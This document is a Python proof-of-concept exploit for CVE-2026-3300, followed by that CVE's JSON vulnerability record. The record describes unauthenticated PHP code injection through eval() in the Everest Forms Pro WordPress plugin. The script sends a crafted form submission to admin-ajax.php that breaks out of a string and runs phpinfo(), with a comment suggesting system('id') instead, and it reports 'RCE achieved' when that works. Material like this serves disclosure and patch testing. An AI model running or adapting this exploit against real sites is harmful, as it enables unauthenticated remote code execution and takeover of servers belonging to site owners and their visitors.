CVE-2026-3300

import requests # PoC for CVE-2026-3300 # Target: WordPress site with Everest Forms Pro <= 1.9.12 # Note: The form must use the "Complex Calculation" feature. target_url = "http://example.com/wp-admin/admin-ajax.php" # The payload injects PHP code to execute a system command (e.g., id) # Context: $input_value = 'USER_INPUT'; -> Payload: ');system('id');// payload_data = { "action": "evf_submit_form", "everest_forms[id]": "1", # Malicious input breaking out of the string inside eval() "everest_forms[field_text]": "');phpinfo();//" } headers = { "User-Agent": "Mozilla/5.0", "Content-Type": "application/x-www-form-urlencoded" } try: response = requests.post(target_url, data=payload_data, headers=headers, timeout=10) if response.status_code == 200: # Check if phpinfo output is present in the response if "PHP Version" in response.text: print("[+] Exploit successful! RCE achieved.") else: print("[-] Exploit failed or target not vulnerable.") else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] Error: {e}")

{"cve": {"id": "CVE-2026-3300", "sourceIdentifier": "[email protected]", "published": "2026-03-31T02:15:59.267", "lastModified": "2026-04-24T18:11:16.583", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Everest Forms Pro plugin for WordPress is vulnerable to Remote Code Execution via PHP Code Injection in all versions up to, and including, 1.9.12. This is due to the Calculation Addon's process_filter() function concatenating user-submitted form field values into a PHP code string without proper escaping before passing it to eval(). The sanitize_text_field() function applied to input does not escape single quotes or other PHP code context characters. This makes it possible for unauthenticated attackers to inject and execute arbitrary PHP code on the server by submitting a crafted value in any string-type form field (text, email, URL, select, radio) when a form uses the \"Complex Calculation\" feature."}, {"lang": "es", "value": "El plugin Everest Forms Pro para WordPress es vulnerable a ejecución remota de código a través de inyección de código PHP en todas las versiones hasta la 1.9.12, inclusive. Esto se debe a que la función process_filter() del complemento Calculation Addon concatena valores de campos de formulario enviados por el usuario en una cadena de código PHP sin el escape adecuado antes de pasarlos a eval(). La función sanitize_text_field() aplicada a la entrada no escapa comillas simples u otros caracteres de contexto de código PHP. Esto hace posible que atacantes no autenticados inyecten y ejecuten código PHP arbitrario en el servidor al enviar un valor manipulado en cualquier campo de formulario de tipo cadena (texto, correo electrónico, URL, selección, radio) cuando un formulario utiliza la característica 'Cálculo Complejo'."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}]}], "references": [{"url": "https://everestforms.net/changelog/", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/everest-forms/tags/3.4.3/includes/class-evf-form-task.php#L584", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/389c0b89-e408-4ad5-9723-a16b745771f0?source=cve", "source": "[email protected]"}]}}